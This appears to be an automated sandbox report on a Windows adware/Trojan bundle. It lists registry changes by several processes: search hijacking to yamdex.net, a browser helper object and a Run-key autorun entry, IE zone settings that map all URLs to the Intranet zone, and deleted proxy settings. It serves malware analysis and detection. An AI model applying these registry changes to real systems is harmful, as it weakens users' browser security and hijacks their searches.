[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKCU\Software\IM\shortcuts]
"QzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xhZG1cQXBwbGljYXRpb24gRGF0YVxNaWNyb3NvZnRcSW50ZXJuZXQgRXhwbG9yZXJcUXVpY2sgTGF1bmNoXExhdW5jaCBJbnRlcm5ldCBFeHBsb3JlciBCcm93c2VyLmxuaw==" = ""
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3C}]
"SuggestionsURLFallback" = "http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=809ae869fb7d3446ed13503ac7f7313b&text={searchTerms}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{0633EE93-D776-472f-A0FF-E1416B8B2E3C}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Search_URL" = "http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=809ae869fb7d3446ed13503ac7f7313b&text={searchTerms}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\IM\shortcuts]
"QzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xhZG1cRGVza3RvcFxBbWlnby5sbms=" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3C}]
"URL" = "http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=809ae869fb7d3446ed13503ac7f7313b&text={searchTerms}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B EC 23 3C 36 0B 9A 1E A4 7C B7 DD 1D BA 78 8F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3C}]
"SuggestionsURL" = "http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=809ae869fb7d3446ed13503ac7f7313b&text={searchTerms}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3C}]
"DisplayName" = "yambler"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKCU\Software\IM\shortcuts]
"QzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xhZG1cU3RhcnQgTWVudVxQcm9ncmFtc1xBbWlnby5sbms=" = ""
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{717598EB-33E7-4687-94A0-8D20DCB6D246}]
"etranslator_gui_0 (6) (2).exe" = "etranslator_gui_0 (6) (2)"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{80C47B02-16F0-424C-920F-6B5A889D2A44}]
"id1 - 34.exe" = "id1 - 34"
[HKCU\Software\IM\shortcuts]
"QzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xhZG1cU3RhcnQgTWVudVxQcm9ncmFtc1xJbnRlcm5ldCBFeHBsb3Jlci5sbms=" = ""
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\9e913b6133dc02e55a5a01a69b184321\DEBUG]
"Trace Level"
The process bddownloader.exe:2316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\0\win32]
"(Default)" = "%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe"
[HKCR\BDDownloadProxy.Downloader\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"
[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\LocalServer32]
"(Default)" = "%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\BDDownloadProxy.Downloader.1]
"(Default)" = "Downloader Class"
[HKCR\BDDownloadProxy.Downloader.1\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\BDDownloadProxy.Downloader]
"(Default)" = "Downloader Class"
[HKCR\AppID\{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}]
"(Default)" = "DownloadProxy"
[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"(Default)" = "Downloader Class"
[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\ProgID]
"(Default)" = "BDDownloadProxy.Downloader.1"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"netsh.exe" = "Network Command Shell"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"Version" = "1.0"
[HKCR\AppID\DownloadProxy.EXE]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\HELPDIR]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A AE 9C 1A 0B EA 2D 12 9F 6A D0 43 DB 66 66 09"
[HKCR\BDDownloadProxy.Downloader\CurVer]
"(Default)" = "BDDownloadProxy.Downloader.1"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"
[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}]
"(Default)" = "_IDownloaderEvents"
[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0]
"(Default)" = "DownloadProxy 1.0 Type Library"
[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\VersionIndependentProgID]
"(Default)" = "BDDownloadProxy.Downloader"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process RegSvr32.exe:4092 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 0D D9 29 D9 8E 2C E4 F9 2A 43 17 93 42 D9 1B"
[HKCR\CLSID\{15DEE173-1BE9-4424-81E0-58A87076E9B1}\InprocServer32]
"ThreadingModel" = "Apartment"
"(Default)" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\websafe\WebMonBHO.dll"
[HKCR\CLSID\{15DEE173-1BE9-4424-81E0-58A87076E9B1}]
"(Default)" = "WebMonBHO"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{15DEE173-1BE9-4424-81E0-58A87076E9B1}]
"(Default)" = "BDHOOK"
"NoExplorer" = "1"
The process RegSvr32.exe:2168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 87 FE 60 B3 57 5F DB 4E F4 57 60 19 BF 5C 70"
[HKCR\BDShellExt.BDShellExtMenu\CLSID]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"
[HKCR\BDShellExt.BDShellExtMenu\CurVer]
"(Default)" = "BDShellExt.BDShellExtMenu.1"
[HKCR\BDShellExt.BDShellExtMenu.1]
"(Default)" = "BDShellExtMenu Class"
[HKCR\BDShellExt.BDShellExtMenu]
"(Default)" = "BDShellExtMenu Class"
[HKCR\BDShellExt.BDShellExtMenu.1\CLSID]
"(Default)" = "{00890530-6A9F-4be2-B1BB-73F01E2BB986}"
[HKCR\AppID\{FBE0E29B-01DB-4876-B147-46F5AABA6823}]
"(Default)" = "BDShellExt"
[HKCR\AppID\BDShellExt.DLL]
"AppID" = "{FBE0E29B-01DB-4876-B147-46F5AABA6823}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{00890530-6A9F-4be2-B1BB-73F01E2BB986}" = "BDShellExtMenu Class"
The Trojan deletes the following registry key(s):
[HKCR\BDShellExt.BDShellExtMenu\CurVer]
[HKCR\BDShellExt.BDShellExtMenu.1\CLSID]
[HKCR\BDShellExt.BDShellExtMenu\CLSID]
[HKCR\BDShellExt.BDShellExtMenu.1]
[HKCR\BDShellExt.BDShellExtMenu]
The process RegSvr32.exe:2272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 8B 5E 16 95 C6 F5 FD 5F 8B F4 30 61 0D 0C 06"
The process AmigoDistrib.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 1C E5 86 42 48 A2 BD D2 4F F4 BD D2 37 C6 67"
[HKCU\Software\Mail.Ru\AmigoInstaller]
"RFR" = "profitraf7"
The process netsh.exe:2480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 99 EE BF CD 2D 9C BE F1 E3 22 D6 2E CF 89 C4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
The process BaiduSdTray.exe:2996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A 6E 80 4E 23 B9 90 04 46 3D 2B 38 D1 EE 4A 6E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID]
"{15DEE173-1BE9-4424-81E0-58A87076E9B1}" = "1A"
The process etranslator_gui_0 (6) (2).exe:1056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\eTranslator]
"PCID" = "im7-200042305-C2107680-92B0-4F35-BA61-7AEA2CB9A809"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\etranslator]
"DisplayName" = "etranslator"
[HKCU\Software\eTranslator]
"PathToApplication" = "%Documents and Settings%\%current user%\Application Data\eTranslator\eTranslator.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"taskkill.exe" = "Kill Process"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\etranslator]
"Publisher" = "etranslator"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\etranslator]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\eTranslator\eTranslator.exe /uninstall"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E A2 6C C0 92 1A F7 20 E3 F4 91 D5 1D AD 5B A6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\etranslator]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\eTranslator\eTranslator.exe"
[HKCU\Software\eTranslator]
"Version" = "0"
"dir" = "16"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"eTranslator Update" = "%Documents and Settings%\%current user%\Application Data\eTranslator\eTranslator.exe -checkforupdates"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The process BindEx.exe:708 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 07 D6 67 6D 52 54 C8 6C 27 68 65 1A B3 48 B1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度æÂ€毒]
[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}]
The process BindEx.exe:248 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD C9 0D 9F C6 A3 83 6A 35 B6 B6 51 DF DA 77 D4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process setup.tmp:1748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"NoRepair" = "1"
"QuietUninstallString" = "%Program Files%\baidu\unins000.exe /SILENT"
"DisplayVersion" = "1.9"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: Selected Tasks" = "startup,bind1"
"Inno Setup: Icon Group" = "baidu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"MinorVersion" = "9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: Deselected Tasks" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"InstallDate" = "20141211"
"DisplayName" = "baidu version 1.9"
"UninstallString" = "%Program Files%\baidu\unins000.exe"
"Inno Setup: User" = "%CurrentUserName%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\baidu]
"BindEx.exe" = "BindEx"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
